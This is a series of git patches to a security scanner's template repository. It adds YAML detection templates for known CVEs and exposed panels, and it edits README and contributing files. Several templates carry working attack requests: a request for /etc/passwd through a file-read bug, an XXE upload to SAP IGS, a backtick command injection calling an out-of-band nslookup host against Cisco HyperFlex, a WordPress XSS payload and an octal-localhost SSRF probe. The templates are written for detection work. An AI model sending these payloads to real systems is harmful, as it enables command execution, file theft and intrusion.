Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion + name: WP Vault 0.8.6.6 – Local File Inclusion author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/40850 From b7b60ee52a10ee77da141b265e8e49f8c1a3cb40 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Jul 2021 15:38:29 +0000 Subject: [PATCH 0272/4083] Auto Update README [Mon Jul 5 15:38:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 46b3008d8d..d25c126413 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 206 | exposed-panels | 180 | +| cves | 377 | vulnerabilities | 207 | exposed-panels | 180 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1416 files**. +**125 directories, 1417 files**. From f50149b5288a6ca7c729bce7e68be5df3cb51a1a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Jul 2021 16:16:19 +0000 Subject: [PATCH 0273/4083] Auto Update README [Mon Jul 5 16:16:19 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d25c126413..026f10761d 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 377 | vulnerabilities | 207 | exposed-panels | 180 | +| cves | 377 | vulnerabilities | 208 | exposed-panels | 180 | | takeovers | 69 | exposures | 108 | technologies | 108 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1417 files**. +**125 directories, 1418 files**. From 7c06dfaf706a6ff6ab7d7fae0a8b2aa6e3affc8a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 5 Jul 2021 21:59:12 +0530 Subject: [PATCH 0274/4083] Create huijietong-cloud-fileread.yaml --- .../other/huijietong-cloud-fileread.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/other/huijietong-cloud-fileread.yaml diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml new file mode 100644 index 0000000000..085d818692 --- /dev/null +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -0,0 +1,23 @@ +id: huijietong-cloud-fileread +info: + name: Huijietong Cloud File Read + author: princechaddha + severity: high + tags: huijietong,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 05b2837a0a6d0dc16a5c71af12e1329d7a716b26 Mon Sep 17 00:00:00 2001 From: Ivanov Vladimir Date: Mon, 5 Jul 2021 19:40:37 +0300 Subject: [PATCH 0275/4083] Add CVE-2018-2392.yaml --- cves/2018/CVE-2018-2392.yaml | 84 ++++++++++++++++++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 cves/2018/CVE-2018-2392.yaml diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml new file mode 100644 index 0000000000..906f3533b6 --- /dev/null +++ b/cves/2018/CVE-2018-2392.yaml @@ -0,0 +1,84 @@ +id: CVE-2018-2392 + +info: + name: SAP Internet Graphics Server (IGS) XML External Entity + author: _generic_human_ + severity: high + tags: cve,sap,igs,xxe,xmlchart + description: | + SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. + reference: + - https://launchpad.support.sap.com/#/notes/2525222 + - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/ + - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ + - https://troopers.de/troopers18/agenda/3r38lr/ + - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb + +requests: + - raw: + - | + POST /XMLCHART HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary={{randstr_1}} + + --{{randstr_1}} + Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml" + Content-Type: application/xml + + + + + ALttP + + + + 12345 + + + + --{{randstr_1}} + Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml" + Content-Type: application/xml + + + ]> + + + + + <Extension>&xxe;</Extension> + + + + + --{{randstr_1}}-- + + # file name - /etc/passwd + + matchers-condition: and + matchers: + - type: word + words: + - "Picture" + - "Info" + - "/output/" + part: body + condition: and + + - type: word + words: + - "ImageMap" + - "Errors" + part: body + condition: or + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + - "SAP Internet Graphics Server" + part: header + condition: and From 3ecf9feb74f07e758a11bed78e8ba805d21ee4f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jul 2021 22:27:59 +0530 Subject: [PATCH 0276/4083] Create call-break-cms.yaml --- exposed-panels/call-break-cms.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/call-break-cms.yaml diff --git a/exposed-panels/call-break-cms.yaml b/exposed-panels/call-break-cms.yaml new file mode 100644 index 0000000000..de74bfa1de --- /dev/null +++ b/exposed-panels/call-break-cms.yaml @@ -0,0 +1,18 @@ +id: call-break-cms + +info: + name: Call Break CMS + author: dhiyaneshDk + severity: info + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'Call Break CMS' + condition: and From eb0d1f97665e8a48e2fb334a90cd516b30e08223 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jul 2021 22:31:57 +0530 Subject: [PATCH 0277/4083] Create strapi-page.yaml --- exposures/apis/strapi-page.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposures/apis/strapi-page.yaml diff --git a/exposures/apis/strapi-page.yaml b/exposures/apis/strapi-page.yaml new file mode 100644 index 0000000000..d47e12de16 --- /dev/null +++ b/exposures/apis/strapi-page.yaml @@ -0,0 +1,19 @@ +id: strapi-page + +info: + name: Strapi Page + author: dhiyaneshDk + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'Welcome to your Strapi app' + condition: and From 64f0cc6620622a5caab658edaa6474ed5c0dc799 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jul 2021 22:38:29 +0530 Subject: [PATCH 0278/4083] Create xenforo-login.yaml --- exposed-panels/xenforo-login.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposed-panels/xenforo-login.yaml diff --git a/exposed-panels/xenforo-login.yaml b/exposed-panels/xenforo-login.yaml new file mode 100644 index 0000000000..fa2089d36c --- /dev/null +++ b/exposed-panels/xenforo-login.yaml @@ -0,0 +1,19 @@ +id: xenforo-login + +info: + name: XenForo Login/Register + author: dhiyaneshDk + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php' + + matchers: + - type: word + words: + - 'XenForo' + condition: and From 2b74c99ce85b4c501bd75fa2b2f1c1cb0a5f2073 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jul 2021 22:44:11 +0530 Subject: [PATCH 0279/4083] Create nginx-linux-page.yaml --- technologies/nginx-linux-page.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/nginx-linux-page.yaml diff --git a/technologies/nginx-linux-page.yaml b/technologies/nginx-linux-page.yaml new file mode 100644 index 0000000000..53f2ba8e09 --- /dev/null +++ b/technologies/nginx-linux-page.yaml @@ -0,0 +1,19 @@ +id: nginx-linux-page + +info: + name: Nginx HTTP Server Amazon Linux + author: dhiyaneshDk + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+Nginx+HTTP+Server+on+Amazon+Linux%22 + tags: tech,nginx + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - 'Test Page for the Nginx HTTP Server on Amazon Linux' + condition: and From 648def7a9c62c0dbf268f66aceef18b1859b7a27 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 5 Jul 2021 22:45:34 +0530 Subject: [PATCH 0280/4083] Update strapi-page.yaml --- exposures/apis/strapi-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/apis/strapi-page.yaml b/exposures/apis/strapi-page.yaml index d47e12de16..133c9a43ba 100644 --- a/exposures/apis/strapi-page.yaml +++ b/exposures/apis/strapi-page.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 - tags: panel + tags: api,strapi requests: - method: GET From 8938010a7ade6062727c4b8742768a634e07e45f Mon Sep 17 00:00:00 2001 From: Ivanov Vladimir Date: Mon, 5 Jul 2021 20:36:55 +0300 Subject: [PATCH 0281/4083] Add CVE-2020-6207.yaml --- cves/2020/CVE-2020-6207.yaml | 48 ++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 cves/2020/CVE-2020-6207.yaml diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml new file mode 100644 index 0000000000..55a9f04a6f --- /dev/null +++ b/cves/2020/CVE-2020-6207.yaml @@ -0,0 +1,48 @@ +id: CVE-2020-6207 + +info: + name: SAP Solution Manager remote unauthorized OS commands execution + author: _generic_human_ + severity: critical + tags: cve,sap,solman,rce + description: | + SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent. + reference: + - https://launchpad.support.sap.com/#/notes/2890213 + - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305 + - https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf + - https://github.com/chipik/SAP_EEM_CVE-2020-6207 + - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/ + - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/ + +requests: + - raw: + - | + POST /EemAdminService/EemAdmin HTTP/1.1 + Host: {{Hostname}} + SOAPAction: "" + Content-Type: text/xml; charset=UTF-8 + Connection: close + + + + matchers-condition: and + matchers: + - type: word + words: + - ":Envelope" + - ":Body" + - ":getAllAgentInfoResponse" + part: body + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/xml" + - "SAP NetWeaver Application Server" + part: header + condition: and From cd23603f542f7f959065c94460b45be72ac2dedf Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 5 Jul 2021 19:58:44 +0200 Subject: [PATCH 0282/4083] Add detection template for OAUTH2 See https://auth0.com/docs/protocols/protocol-oauth2#token-endpoint --- technologies/oauth2-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/oauth2-detect.yaml diff --git a/technologies/oauth2-detect.yaml b/technologies/oauth2-detect.yaml new file mode 100644 index 0000000000..639724d4e8 --- /dev/null +++ b/technologies/oauth2-detect.yaml @@ -0,0 +1,19 @@ +id: oauth2-detect + +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth + +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + + matchers: + - type: status + status: + - 401 From 0f5146b972e38e8872884f2622c9147ebf8546bf Mon Sep 17 00:00:00 2001 From: Jeenika Anadani <55793578+jeenikaa@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:47:03 +0530 Subject: [PATCH 0283/4083] erp-detection --- technologies/erp-detection.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 technologies/erp-detection.yaml diff --git a/technologies/erp-detection.yaml b/technologies/erp-detection.yaml new file mode 100644 index 0000000000..2f3357555b --- /dev/null +++ b/technologies/erp-detection.yaml @@ -0,0 +1,17 @@ +id: erp-db-detect +info: + name: ERP Database instance detection + author: j33n1k4 + severity: info + tags: database,erp +requests: + - method: GET + path: + - "{{BaseURL}}/web/database/selector" + matchers: + - type: word + words: + - "Powered by OpenERP" + - type: status + status: + - 200 From 6681c7dceff93ff12b377a5d1947791759953dce Mon Sep 17 00:00:00 2001 From: Jeenika Anadani <55793578+jeenikaa@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:47:51 +0530 Subject: [PATCH 0284/4083] config-detection --- vulnerabilities/other/config-detect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 vulnerabilities/other/config-detect.yaml diff --git a/vulnerabilities/other/config-detect.yaml b/vulnerabilities/other/config-detect.yaml new file mode 100644 index 0000000000..6dc767b69c --- /dev/null +++ b/vulnerabilities/other/config-detect.yaml @@ -0,0 +1,20 @@ +xid: configuration-files-detection +info: + name: Sensitive Configuration Files Detection + author: j33n1k4 + severity: medium + description: directory listing of sensitive files + reference: https://www.exploit-db.com/ghdb/7014 + tags: config,files,directory-listing +requests: + - method: GET + path: + - "{{BaseURL}}/config/" + matchers: + - type: word + words: + - "Index of" + - "/config" + - type: status + status: + - 200 From 71dd0de29d99c860b97316244235f5b178941caf Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 6 Jul 2021 09:30:13 +0900 Subject: [PATCH 0285/4083] Create CVE-2021-1497.yaml Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-1497.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-1497.yaml diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml new file mode 100644 index 0000000000..a177944838 --- /dev/null +++ b/cves/2021/CVE-2021-1497.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-1497 + +info: + name: Cisco HyperFlex HX Data Platform RCE + author: gy741 + severity: critical + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-1497 + - https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497 + - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html + - https://twitter.com/cycatz2/status/1394615546935529472 + - https://twitter.com/Unit42_Intel/status/1402655493735206915 + - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution + tags: cisco,rce,oob + +requests: + - raw: + - | + POST /storfs-asup HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Content-Length: 78 + Content-Type: application/x-www-form-urlencoded + + action=&token=`nslookup {{interactsh-url}}`&mode=`nslookup {{interactsh-url}}` + + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" From 601a192703a06d5b2841416d1da186e2de1501a6 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Mon, 5 Jul 2021 18:39:25 -0600 Subject: [PATCH 0286/4083] Added bypass for 1.9.2 Another payload was identified, as a bypass in version 1.9.2. This bypass caused the vendor to upgrade to 1.9.3 I have added the bypass and the matcher above. Let me know what you think. --- .../wordpress/wp-plugin-marmoset-viewer-xss.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml index 64f52771fa..f70fb35331 100644 --- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml +++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml @@ -11,16 +11,16 @@ requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - + - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "" + - "alert(/{{randstr}}/)" - "Marmoset Viewer" part: body - condition: and \ No newline at end of file + condition: and From 86c974e1bad52610584ae0a0ae8bcb47b8d63eeb Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 10:51:22 +0530 Subject: [PATCH 0287/4083] misc changes --- CONTRIBUTING.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index b472069b6e..e09bab53e4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -1,8 +1,8 @@ -# Template Contributing Guidelines +# Template Contribution Guidelines This documentation contains a set of guidelines to help you during the contribution process. We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project. -Thank you for helping out and remember,**no contribution is too small.** +Thank you for helping out and remember, **no contribution is too small.** # Submitting Nuclei Templates 👩‍💻👨‍💻 @@ -11,7 +11,7 @@ Below you will find the process and workflow used to review and merge your chang ## Step 1 : Find existing templates - Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one. -- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work +- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work. - Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template. ## Step 2 : Fork the Project @@ -20,7 +20,7 @@ Below you will find the process and workflow used to review and merge your chang template-fork -```yaml +```sh git clone https://github.com//nuclei-templates cd nuclei-templates git remote add upstream https://github.com/projectdiscovery/nuclei-templates @@ -28,7 +28,7 @@ git remote add upstream https://github.com/projectdiscovery/nuclei-templates - If you have already forked the project, update your copy before working. -```yaml +```sh git remote update git checkout master git rebase upstream/master @@ -38,7 +38,7 @@ git rebase upstream/master Create a new branch. Use its name to identify the issue your addressing. -```yaml +```sh # It will create a new branch with name template_branch_name and switch to that branch git checkout -b template_branch_name @@ -49,14 +49,14 @@ git checkout -b template_branch_name - Add all the files/folders needed. - After you've made changes or completed template creation, add changes to the branch you've just created by: -```yaml +```sh # To add all new files to branch template_branch_name git add . ``` - To commit give a descriptive message for the convenience of reveiwer by: -```yaml +```sh # This message get associated with all files you have changed git commit -m "Added/Fixed/Updated XXX Template" ``` @@ -69,22 +69,22 @@ git commit -m "Added/Fixed/Updated XXX Template" ## Step 5 : Push Your Changes -- Now you are ready to your work to the remote repository. +- Now you are ready to push your template to the remote (forked) repository. - When your work is ready and complies with the project conventions, upload your changes to your fork: -```yaml +```sh # To push your work to your remote repository git push -u origin template_branch_name ``` ## Step 6 : Pull Request -- Go to your repository in browser and click on compare and pull requests. Then add a title and description to your pull request that explains your template. -- Voila! Your Pull Request has been submitted and will be reviewed by the moderators and merged.🥳 +- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to you pull request, that describes the purpose of the template. +- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳 ## Need more help?🤔 -You can refer to the following articles on basics of Git and Github and also contact the Project Mentors, in case you are stuck: +You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server. - [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo) - [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request) From f670e6118141c1f0d5dc89016f5cfa6379e05387 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 11:32:05 +0530 Subject: [PATCH 0288/4083] Added Pull Request template --- .../ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 .github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md diff --git a/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md b/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 0000000000..f81a7728f7 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,42 @@ +### Template / PR Information + + + + +- _Fixed CVE-2020-XXX_ / _Added CVE-2020-XXX_ +- Reference: + - https://github.com/XXXXX/poc + - https://nvd.nist.gov/vuln/detail/CVE-2020-XXX + +### Template Validation + +I've validated this template locally? +- [ ] YES +- [ ] NO + + + + + + + + + +### Additional References: + +- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/) +- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) +- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md) +- [PD-Community Discord server](https://discord.gg/projectdiscovery) \ No newline at end of file From 9068a38b5636c11b8af2259cf302a6b2e3bb7ad9 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:27:15 -0600 Subject: [PATCH 0289/4083] Update reference Currently, the provided reference doesn't exist anymore. However, this tweet posted on May 9th should work as a reference. --- vulnerabilities/moodle/moodle-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml index d70a8fd8e8..bb07fda91a 100644 --- a/vulnerabilities/moodle/moodle-xss.yaml +++ b/vulnerabilities/moodle/moodle-xss.yaml @@ -6,7 +6,7 @@ info: description: XSS in moodle via redirect_uri parameter severity: medium tags: moodle,xss - reference: https://twitter.com/kx1z0/status/1381588818256617479 + reference: https://twitter.com/JacksonHHax/status/1391367064154042377 requests: - method: GET @@ -29,4 +29,4 @@ requests: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" From a2f283c51b4834d25fbb03468cedba8bea02a10f Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:32:35 -0600 Subject: [PATCH 0290/4083] CVE number was assigned As stated. --- vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml index f70fb35331..b9659a7b00 100644 --- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml +++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml @@ -1,7 +1,7 @@ id: wp-plugin-marmoset-viewer-xss info: - name: Wordpress Plugin Marmoset Viewer XSS + name: Wordpress Plugin Marmoset Viewer XSS [CVE-2021-24495] author: johnjhacking severity: medium tags: wordpress,xss From 192201c27c421fda74deb01420e8372de9c3fe3c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:03:51 +0530 Subject: [PATCH 0291/4083] condition update as per new bypass --- .../wordpress/wp-plugin-marmoset-viewer-xss.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml index f70fb35331..5298554865 100644 --- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml +++ b/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml @@ -17,10 +17,14 @@ requests: - type: status status: - 200 + - type: word words: - "" - "alert(/{{randstr}}/)" - - "Marmoset Viewer" part: body - condition: and + condition: or + + - type: word + words: + - "Marmoset Viewer" From fc68a95803afb354c81aa9cb3b77822dd241d8af Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:07:53 +0530 Subject: [PATCH 0292/4083] Template Name/ID update as per assigned CVE --- .../2021/CVE-2021-24495.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml => cves/2021/CVE-2021-24495.yaml (86%) diff --git a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml b/cves/2021/CVE-2021-24495.yaml similarity index 86% rename from vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml rename to cves/2021/CVE-2021-24495.yaml index add222e1e3..6fee74af68 100644 --- a/vulnerabilities/wordpress/wp-plugin-marmoset-viewer-xss.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -1,10 +1,10 @@ -id: wp-plugin-marmoset-viewer-xss +id: CVE-2021-24495 info: - name: Wordpress Plugin Marmoset Viewer XSS [CVE-2021-24495] + name: Wordpress Plugin Marmoset Viewer XSS author: johnjhacking severity: medium - tags: wordpress,xss + tags: cve,cve2021,wp-plugin,wordpress,xss reference: https://wordpress.org/plugins/marmoset-viewer/#developers requests: @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" + matchers-condition: and matchers: - type: status From 6dd96ede94dafb1151fb4f7cdcf74a3b7e566043 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 12:12:09 +0530 Subject: [PATCH 0293/4083] Added additional reference --- cves/2021/CVE-2021-24495.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 6fee74af68..35d8f8ffab 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -5,7 +5,9 @@ info: author: johnjhacking severity: medium tags: cve,cve2021,wp-plugin,wordpress,xss - reference: https://wordpress.org/plugins/marmoset-viewer/#developers + reference: | + - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ + - https://wordpress.org/plugins/marmoset-viewer/#developers requests: - method: GET From 7dd0795296a2d76db67a7c7bcbf364b2be4ea937 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Tue, 6 Jul 2021 00:50:43 -0600 Subject: [PATCH 0294/4083] Create Netmask SSRF Template The basic test to fuzz for the netmask SSRF vulnerability would be to use an Octal payload that resolves to the localhost. I limited it to 4 basic testing payloads as to not slow down the speed of a full-length CVE directories test. --- cves/2021/CVE-2021-28918.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-28918.yaml diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml new file mode 100644 index 0000000000..64643764d5 --- /dev/null +++ b/cves/2021/CVE-2021-28918.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-28918 + +info: + name: npm Netmask SSRF + author: johnjhacking + severity: high + reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" + - 